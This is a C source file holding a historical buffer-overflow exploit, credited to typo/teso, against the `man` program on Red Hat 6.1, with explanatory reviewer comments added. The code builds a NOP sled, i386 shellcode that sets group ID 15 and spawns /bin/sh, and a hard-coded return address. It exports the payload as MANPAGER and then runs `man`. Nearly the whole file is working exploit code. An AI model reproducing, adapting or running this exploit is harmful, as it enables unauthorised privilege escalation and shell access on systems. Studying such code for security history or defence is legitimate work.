#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#define OFFSET 0xbfffb32e
#define LEN 4061

#define GID "15" /* man::15: on rh6.1 */

/*
 * Payload that main() embeds in the MANPAGER environment value.
 *
 * The array is assembled from adjacent string literals, so the GID macro
 * is pasted in by the preprocessor as its literal characters ("15"), not
 * encoded as a numeric byte.  The byte string contains no 0x00, which
 * main() depends on because it sizes the payload with strlen().  The
 * trailing bytes are the ASCII text "/bin/sh" followed by "tesocrew!!";
 * the leading bytes look like i386 Linux system-call stubs (int 0x80),
 * which is consistent with the rh6.1 target named above -- not verified here.
 */
unsigned char shellcode[] =
"\x31\xc0\x31\xdb\x31\xc9\xb3"GID"\xb1"GID"\xb0\x47\xcd\x80\xeb\x1e"
"\x5b\x31\xc0\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\x8d\x4b\x08\x8d\x53"
"\x0c\xb0\x0b\xcd\x80\x89\xc3\x31\xc0\xb0\x01\xcd\x80\xe8\xdd\xff\xff"
"\xff\x2f\x62\x69\x6e\x2f\x73\x68\x74\x65\x73\x6f\x63\x72\x65\x77\x21"
"\x21";

/* man sploit by typo/teso (typo@inferno.tusculum.edu) */
/*
 * Historical proof of concept against `man` on Red Hat 6.1.
 *
 * Builds a payload of length `eob`: a run of 0x90 bytes, `shellcode`
 * ending 8 bytes before the end, and the 4-byte value of `offset` in the
 * last four bytes.  The payload is exported as MANPAGER and `man` is then
 * exec'd.  The hard-coded stack address (OFFSET) and the 0x90 sled imply a
 * target without stack randomisation and with an executable stack;
 * presumably the `man` of that era copied MANPAGER into a fixed-size
 * buffer -- the vulnerable code is not shown on this page.
 *
 * argv[1]: signed adjustment added to OFFSET (default 0).
 * argv[2]: payload length `eob` (default LEN).
 *
 * Reviewer notes on the C itself:
 *  - OFFSET (0xbfffb32e) does not fit in int, so the addition is done in
 *    unsigned arithmetic and converted back to int (implementation-defined).
 *  - argv values go through atoi() with no range check, and malloc() is
 *    never checked; see the per-line comments below.
 *  - strlen() is called on an unsigned char array (pointer-sign mismatch
 *    that most compilers only warn about).
 *  - main() falls off the end without a return statement; on success
 *    execlp() replaces the process image, so that path is never reached.
 */
int main(int argc, char *argv[]) 
{
    /* OFFSET is an unsigned int literal: atoi() result is promoted to
     * unsigned here and the sum narrowed back into `offset`. */
    int offset = argc > 1 ? atoi(argv[1]) + OFFSET : OFFSET;
    int eob    = argc > 2 ? atoi(argv[2]) : LEN;   /* payload length, unvalidated */
    char *buffer;

    printf("eob = %d, offset = 0x%x\n", eob, offset);
    buffer = malloc(eob+8);   /* unchecked: a NULL result is dereferenced by memset() below */

    memset(buffer, 0x90, eob);   /* fill the whole payload with 0x90 */
    /* Places shellcode so it ends 8 bytes before `eob`.  If eob is smaller
     * than strlen(shellcode)+8 the destination lies before buffer[0], i.e.
     * an out-of-bounds write -- nothing guards against that. */
    memcpy(buffer + eob - strlen(shellcode) - 8, shellcode, strlen(shellcode));
    memcpy(buffer + eob - 4, &offset, 4);   /* raw int bytes in host byte order */
    buffer[eob] = '\0';    /* in bounds: eob+8 bytes were allocated */

    setenv("MANPAGER", buffer, 1);   /* return value ignored */
    /* Runs `man man`, resolved through PATH.  Only returns on failure,
     * and that failure is not reported. */
    execlp("man", "man", "man", NULL);
}